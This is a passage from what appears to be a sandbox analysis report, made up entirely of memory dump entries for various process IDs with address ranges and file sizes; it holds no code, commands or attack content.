                                                                                                                                                                                                                                                                                • memory/5328-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5352-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5352-260-0x0000000003AA0000-0x0000000003BE0000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                • memory/5424-410-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                • memory/5464-372-0x00000279ED7B0000-0x00000279ED7B2000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5464-403-0x00000279ED7B2000-0x00000279ED7B4000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5464-582-0x00000279ED7B5000-0x00000279ED7B7000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5464-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5464-443-0x00000279ED7B4000-0x00000279ED7B5000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5496-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5496-408-0x00000000058A0000-0x00000000058A1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5500-312-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5500-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5500-586-0x000000001C640000-0x000000001C642000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5508-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5508-253-0x0000000000720000-0x0000000000721000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5620-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5620-397-0x00000000050D0000-0x00000000056E8000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                • memory/5696-301-0x00000000057F0000-0x00000000057F1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5696-283-0x0000000005D30000-0x0000000005D31000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5696-271-0x0000000000400000-0x0000000000422000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                • memory/5696-269-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5696-294-0x00000000058C0000-0x00000000058C1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5696-299-0x0000000005710000-0x0000000005D28000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                • memory/5696-290-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5696-296-0x00000000059D0000-0x00000000059D1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5760-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5776-533-0x00000000008D0000-0x00000000009A4000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  848KB

                                                                                                                                                                                                                                                                                • memory/5776-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5828-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5828-268-0x0000000001820000-0x0000000001822000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5852-321-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5852-343-0x000000001B930000-0x000000001B932000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5852-333-0x00000000015E0000-0x00000000015E1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5852-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5872-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5876-519-0x0000000005810000-0x0000000005811000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/5876-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5944-437-0x0000000001080000-0x0000000001082000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/5992-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5992-501-0x0000000000720000-0x000000000074F000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  188KB

                                                                                                                                                                                                                                                                                • memory/6004-340-0x000000001B570000-0x000000001B572000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/6004-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6004-331-0x0000000000880000-0x0000000000881000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6084-302-0x00000000026E0000-0x00000000026E1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6084-325-0x00000000076A0000-0x00000000076A1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6084-327-0x0000000007DA0000-0x0000000007DA1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6084-337-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6084-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6084-293-0x00000000004A0000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6092-441-0x0000000005D90000-0x0000000005D91000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6092-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6100-278-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6136-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6136-288-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6204-454-0x0000000005170000-0x00000000053F6000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  2.5MB

                                                                                                                                                                                                                                                                                • memory/6452-465-0x00000000048F0000-0x00000000048F1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6452-471-0x00000000048F2000-0x00000000048F3000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6496-449-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                • memory/6692-542-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                • memory/6800-461-0x00000000021A0000-0x00000000021A1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/6908-572-0x00000000054E0000-0x0000000005AF8000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                • memory/6972-576-0x0000000004D00000-0x0000000004F86000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  2.5MB

                                                                                                                                                                                                                                                                                • memory/6980-527-0x0000000005950000-0x0000000005951000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB